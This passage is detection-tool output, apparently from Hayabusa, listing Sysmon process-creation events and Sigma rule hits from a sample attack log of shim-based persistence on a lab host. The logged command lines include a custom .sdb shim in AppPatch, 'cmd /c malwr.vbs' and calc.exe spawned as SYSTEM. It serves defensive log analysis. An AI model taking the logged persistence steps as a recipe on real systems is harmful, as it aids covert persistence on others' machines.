Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL 
C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.497 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.111 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process 
Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 
08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.237 